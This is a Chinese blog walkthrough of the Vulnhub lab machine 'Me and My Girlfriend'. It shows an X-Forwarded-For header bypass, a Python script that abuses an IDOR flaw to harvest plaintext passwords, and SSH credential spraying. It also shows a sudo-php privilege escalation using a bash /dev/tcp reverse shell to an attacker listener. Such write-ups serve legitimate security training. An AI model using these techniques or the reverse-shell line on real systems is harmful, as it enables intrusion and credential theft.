<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Vespera" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  <meta name="description" content="Vespera&#39;s Blog" />
  
  
  
  <title>
    
      MeandMyGirlfriend Walkthrough 
      
      
      |
    
     酒一杯
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-5EG2QXQE91"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'G-5EG2QXQE91');
    </script>
  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.1.1"><link rel="alternate" href="/atom.xml" title="酒一杯" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/">Vespera</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Categories</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/clipboard@2.0.10/dist/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">MeandMyGirlfriend Walkthrough</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2024-03-31 00:08:25
        </span>
        
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="分类"></i>
                
                <span class="span--category">
                  <a href="/categories/Walkthrough/" title="Walkthrough">
                    <b>#</b> Walkthrough
                  </a>
                </span>
                
              </span>
          
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="标签"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/vulnhub/" title="vulnhub">
                    #vulnhub
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h1 id="Reconnaissance"><a href="#Reconnaissance" class="headerlink" title="Reconnaissance"></a>Reconnaissance</h1><h2 id="Nmap"><a href="#Nmap" class="headerlink" title="Nmap"></a>Nmap</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">$ sudo nmap -p- -sT 10.10.10.162 --min-rate 10000 -oA nmapscan/ports</span><br><span class="line">PORT   STATE SERVICE</span><br><span class="line">22/tcp open  ssh</span><br><span class="line">80/tcp open  http</span><br><span class="line"></span><br><span class="line">$ sudo nmap -p22,80 -sT -sV -sC -O 10.10.10.162 -oA nmapscan/detail</span><br><span class="line">PORT   STATE SERVICE VERSION                                                                     </span><br><span class="line">22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)             </span><br><span class="line">| ssh-hostkey:                                                                                    </span><br><span class="line">|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)</span><br><span class="line">|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)</span><br><span class="line">|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)                                  </span><br><span class="line">|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))</span><br><span class="line">|_http-server-header: Apache/2.4.7 (Ubuntu)</span><br><span class="line">|_http-title: Site doesn<span class="string">&#x27;t have a title (text/html).</span></span><br></pre></td></tr></table></figure>



<h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><p>进入 Web 页面，只有一句话：Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<br>查看源码，提示需要加入 HTTP 头 <strong>X-Forwarded-For</strong> ：<code>&lt;!-- Maybe you can search how to use x-forwarded-for --&gt;</code></p>
<blockquote>
<p>[!note] X-Forwarded-For<br>X-Forwarded-For 是用来识别通过 HTTP 代理或负载均衡方式连接到 Web 服务器的客户端最原始的 IP 地址的 HTTP 头字段。</p>
</blockquote>
<p>综上，我们将 X-Forwarded-For 的值设为 127.0.0.1 绕过。<br><img src="https://raw.githubusercontent.com/viyrue/Picbed_personal/main/obsidian/202403301637010.png" alt="image.png"></p>
<p>目录扫描。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">$ gobuster <span class="built_in">dir</span> -u http://10.10.10.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.sql,.html,.rar,.7z,.zip</span><br><span class="line">/.html                (Status: 403) [Size: 284]</span><br><span class="line">/.php                 (Status: 403) [Size: 283] </span><br><span class="line">/index.php            (Status: 200) [Size: 120]</span><br><span class="line">/misc                 (Status: 301) [Size: 310] [--&gt; http://10.10.10.162/misc/]</span><br><span class="line">/config               (Status: 301) [Size: 312] [--&gt; http://10.10.10.162/config/]</span><br><span class="line">/robots.txt           (Status: 200) [Size: 32]</span><br><span class="line">/.php                 (Status: 403) [Size: 283]</span><br><span class="line">/.html                (Status: 403) [Size: 284]</span><br><span class="line">/server-status        (Status: 403) [Size: 292]</span><br></pre></td></tr></table></figure>

<p>访问 &#x2F;robots.txt，显示 Allow: &#x2F;heyhoo.txt</p>
<p>访问 &#x2F;heyhoo.txt，提示 Great! What you need now is reconn, attack and got the shell</p>
<p>测试登录页面，没有 SQL 注入。<br><img src="https://raw.githubusercontent.com/viyrue/Picbed_personal/main/obsidian/202403301700227.png" alt="image.png"></p>
<blockquote>
<p>[!note]<br>可以在 Burp 的设置 - Proxy - Match and replace rules 处添加规则，不用每次请求都手动添加 X-Forwarded-For</p>
</blockquote>
<p>在注册页注册一个账号，进入系统内。发现参数中有 id，可能存在水平越权。<br><img src="https://raw.githubusercontent.com/viyrue/Picbed_personal/main/obsidian/202403301704635.png" alt="image.png|505"></p>
<p>在 profile 页泄露出用户名和明文密码，且可以水平越权。<br><img src="https://raw.githubusercontent.com/viyrue/Picbed_personal/main/obsidian/202403301706122.png" alt="image.png|805"><br><img src="https://raw.githubusercontent.com/viyrue/Picbed_personal/main/obsidian/202403301709734.png" alt="image.png|415"></p>
<h1 id="Getting-Initial-Foothold"><a href="#Getting-Initial-Foothold" class="headerlink" title="Getting Initial Foothold"></a>Getting Initial Foothold</h1><p>写一个 Python 脚本获取所有凭据。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> lxml <span class="keyword">import</span> etree</span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&quot;Host&quot;</span>: <span class="string">&quot;10.10.10.162&quot;</span>,</span><br><span class="line">    <span class="string">&quot;User-Agent&quot;</span>: <span class="string">&quot;Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept&quot;</span>: <span class="string">&quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Language&quot;</span>: <span class="string">&quot;zh,en-US;q=0.7,en;q=0.3&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Accept-Encoding&quot;</span>: <span class="string">&quot;gzip, deflate&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Connection&quot;</span>: <span class="string">&quot;keep-alive&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Cookie&quot;</span>: <span class="string">&quot;PHPSESSID=p89uf2namqfqfe2of8hel8ed06&quot;</span>,</span><br><span class="line">    <span class="string">&quot;Upgrade-Insecure-Requests&quot;</span>: <span class="string">&quot;1&quot;</span>,</span><br><span class="line">    <span class="string">&quot;X-Forwarded-For&quot;</span>: <span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,<span class="number">10</span>):</span><br><span class="line">    url = <span class="string">f&quot;http://10.10.10.162/?page=profile&amp;user_id=<span class="subst">&#123;i&#125;</span>&quot;</span></span><br><span class="line">    r = requests.get(url=url, headers=headers)</span><br><span class="line">    page = etree.HTML(r.text)</span><br><span class="line">    name = page.xpath(<span class="string">&#x27;//*[@id=&quot;name&quot;]/@value&#x27;</span>)</span><br><span class="line">    username = page.xpath(<span class="string">&#x27;//*[@id=&quot;username&quot;]/@value&#x27;</span>)</span><br><span class="line">    password = page.xpath(<span class="string">&#x27;//*[@id=&quot;password&quot;]/@value&#x27;</span>)</span><br><span class="line">    cred = <span class="string">f&quot;<span class="subst">&#123;name[<span class="number">0</span>]&#125;</span>:<span class="subst">&#123;username[<span class="number">0</span>]&#125;</span>:<span class="subst">&#123;password[<span class="number">0</span>]&#125;</span>&quot;</span></span><br><span class="line">    <span class="built_in">print</span>(cred)</span><br></pre></td></tr></table></figure>

<p>awk 取出用户名和密码。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">$ python3 getcreds.py &gt; creds.txt</span><br><span class="line">$ <span class="built_in">cat</span> creds.txt </span><br><span class="line">Eweuh Tandingan:eweuhtandingan:skuyatuh</span><br><span class="line">Aing Maung:aingmaung:qwerty!!!</span><br><span class="line">Sunda Tea:sundatea:indONEsia</span><br><span class="line">Sedih Aing Mah:sedihaingmah:cedihhihihi</span><br><span class="line">Alice Geulis:alice:4lic3</span><br><span class="line">::</span><br><span class="line">::</span><br><span class="line">::</span><br><span class="line">Abdi Kasep:abdikasepak:dorrrrr</span><br><span class="line"></span><br><span class="line">$ <span class="built_in">cat</span> creds.txt | awk -F <span class="string">&#x27;:&#x27;</span> <span class="string">&#x27;&#123;print $2&#125;&#x27;</span> &gt; username</span><br><span class="line">$ <span class="built_in">cat</span> creds.txt | awk -F <span class="string">&#x27;:&#x27;</span> <span class="string">&#x27;&#123;print $3&#125;&#x27;</span> &gt; pass</span><br></pre></td></tr></table></figure>

<p>使用 crackmapexec 枚举出可以连接 SSH 的凭据，得到 alice 用户的初始立足点。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">$ crackmapexec ssh 10.10.10.162 -u username -p pass --continue-on-success</span><br><span class="line">SSH         10.10.10.162    22     10.10.10.162     [+] alice:4lic3</span><br><span class="line"></span><br><span class="line">$ ssh alice@10.10.10.162                                                         </span><br><span class="line">alice@gfriEND:~$ <span class="built_in">whoami</span></span><br><span class="line">alice</span><br><span class="line">alice@gfriEND:~$ <span class="built_in">export</span> TERM=xterm-color</span><br></pre></td></tr></table></figure>

<p>拿到 flag.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">alice@gfriEND:~/.my_secret$ <span class="built_in">ls</span></span><br><span class="line">flag1.txt  my_notes.txt</span><br><span class="line"></span><br><span class="line">alice@gfriEND:~/.my_secret$ <span class="built_in">cat</span> flag1.txt </span><br><span class="line">Greattttt my brother! You saw the Alice<span class="string">&#x27;s note! Now you save the record information to give to bob! I know if it&#x27;</span>s given to him <span class="keyword">then</span> Bob will be hurt but this is better than Bob cheated!</span><br><span class="line">Now your last job is get access to the root and <span class="built_in">read</span> the flag ^_^</span><br><span class="line">Flag 1 : gfriEND&#123;2f5f21b2af1b8c3e227bcf35544f8f09&#125;</span><br><span class="line"></span><br><span class="line">alice@gfriEND:~/.my_secret$ <span class="built_in">cat</span> my_notes.txt </span><br><span class="line">Woahhh! I like this company, I hope that here i get a better partner than bob ^_^, hopefully Bob doesn<span class="string">&#x27;t know my notes</span></span><br><span class="line"><span class="string"></span></span><br></pre></td></tr></table></figure>



<h1 id="Privilege-Escalation"><a href="#Privilege-Escalation" class="headerlink" title="Privilege Escalation"></a>Privilege Escalation</h1><p>sudo 权限枚举，可以运行 php.</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">alice@gfriEND:~$ sudo -l</span><br><span class="line">Matching Defaults entries <span class="keyword">for</span> alice on gfriEND:</span><br><span class="line">    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin</span><br><span class="line"></span><br><span class="line">User alice may run the following commands on gfriEND:</span><br><span class="line">    (root) NOPASSWD: /usr/bin/php</span><br></pre></td></tr></table></figure>

<p>向 php 文件中写入 payload 提权，但得到的 root shell 没有回显。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">alice@gfriEND:~$ <span class="built_in">echo</span> <span class="string">&quot;&lt;?php exec(\&quot;/bin/bash -p\&quot;);?&gt;&quot;</span> &gt;&gt; root.php</span><br><span class="line">alice@gfriEND:~$ sudo /usr/bin/php root.php </span><br><span class="line">root@gfriEND:~<span class="comment"># id</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>[!hint]<br>因为第一个 payload 在 PHP 代码中调用了 <code>exec</code> 函数来执行 <code>/bin/bash -p</code>，但是没有输出到标准输出(stdout)。因此不会看到任何直接的回显。应该用 <code>system()</code> 函数来执行命令：<code>sudo /usr/bin/php -r &quot;system(&#39;/bin/bash -p&#39;);&quot;</code>，这个函数在执行命令后会将结果输出到标准输出(stdout)。<code>-r</code> 选项允许在命令行中直接执行 PHP 代码。</p>
</blockquote>
<p>写入 reverse shell，sudo 执行。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">alice@gfriEND:~$ <span class="built_in">echo</span> <span class="string">&quot;&lt;?php exec(\&quot;/bin/bash -c &#x27;bash -i &gt;&amp; /dev/tcp/10.10.10.138/443 0&gt;&amp;1&#x27;\&quot;);?&gt;&quot;</span> &gt;&gt; shell.php</span><br><span class="line">alice@gfriEND:~$ sudo /usr/bin/php shell.php</span><br></pre></td></tr></table></figure>

<p>开启监听，得到 root 权限。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$ sudo nc -lvnp 443                                                                              </span><br><span class="line">listening on [any] 443 ...</span><br><span class="line">connect to [10.10.10.138] from (UNKNOWN) [10.10.10.162] 44646</span><br><span class="line">root@gfriEND:~<span class="comment"># id     </span></span><br><span class="line">uid=0(root) gid=0(root) <span class="built_in">groups</span>=0(root)  </span><br><span class="line">root@gfriEND:~<span class="comment"># cat /root/flag2.txt </span></span><br><span class="line"><span class="built_in">cat</span> /root/flag2.txt       </span><br><span class="line">________        __    ___________.__             ___________.__                ._.</span><br><span class="line"> /  _____/  _____/  |_  \__    ___/|  |__   ____   \_   _____/|  | _____     ____| |</span><br><span class="line">/   \  ___ /  _ \   __\   |    |   |  |  \_/ __ \   |    __)  |  | \__  \   / ___\ |</span><br><span class="line">\    \_\  (  &lt;_&gt; )  |     |    |   |   Y  \  ___/   |     \   |  |__/ __ \_/ /_/  &gt;|</span><br><span class="line"> \______  /\____/|__|     |____|   |___|  /\___  &gt;  \___  /   |____(____  /\___  /__</span><br><span class="line">        \/                              \/     \/       \/              \//_____/ \/</span><br><span class="line">Yeaaahhhh!! You have successfully hacked this company server! I hope you <span class="built_in">who</span> have just learned can get new knowledge from here :) I really hope yo</span><br><span class="line">u guys give me feedback <span class="keyword">for</span> this challenge whether you like it or not because it can be a reference <span class="keyword">for</span> me to be even better! I hope this can cont</span><br><span class="line">inue :)</span><br><span class="line">Contact me <span class="keyword">if</span> you want to contribute / give me feedback / share your writeup!</span><br><span class="line">Twitter: @makegreatagain_</span><br><span class="line">Instagram: @aldodimas73</span><br><span class="line">Thanks! Flag 2: gfriEND&#123;56fbeef560930e77ff984b644fde66e7&#125;</span><br></pre></td></tr></table></figure>



<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p>进入 Web 界面，显示该网站只能通过本地访问，源代码注释中提示需要使用 HTTP 请求头 X-Forwarded-For，我们添加 <code>X-Forwarded-For: 127.0.0.1</code> 绕过限制。注册账号登录进系统，在 profile 处泄露出用户名和密码，并且可以水平越权获取到其它用户凭据。最终使用 alice 用户凭据连接到 SSH，得到初始权限。<br>枚举系统发现用户具有 php 的sudo 权限，sudo 执行 php 的反弹 shell 得到 root 权限。</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/posts/4d79e97b.html" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2024-03-31 00:08:25
            </span>
            
                  <span class="post-categories">
                    <i class="iconfont icon-bookmark" title="分类"></i>
                    
                    <span class="span--category">
                      <a href="/categories/Walkthrough/" title="Walkthrough">
                        <b>#</b> Walkthrough
                      </a>
                    </span>
                    
                  </span>
              
                  <span class="post-tags">
                    <i class="iconfont icon-tags mr-10" title="标签"></i>
                    
                    <span class="span--tag mr-8">
                      <a href="/tags/vulnhub/" title="vulnhub">
                        #vulnhub
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Reconnaissance"><span class="toc-text">Reconnaissance</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Nmap"><span class="toc-text">Nmap</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web"><span class="toc-text">Web</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Getting-Initial-Foothold"><span class="toc-text">Getting Initial Foothold</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Privilege-Escalation"><span class="toc-text">Privilege Escalation</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
        <li>
          
              <a title="rss" href="/atom.xml">
                <i class="iconfont icon-rss"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2024 Vespera</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="search...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + MeandMyGirlfriend%20Walkthrough + '&url=' + http%3A%2F%2Fexample.com%2Fposts%2F41077065.html + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://example.com/posts/41077065.html" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
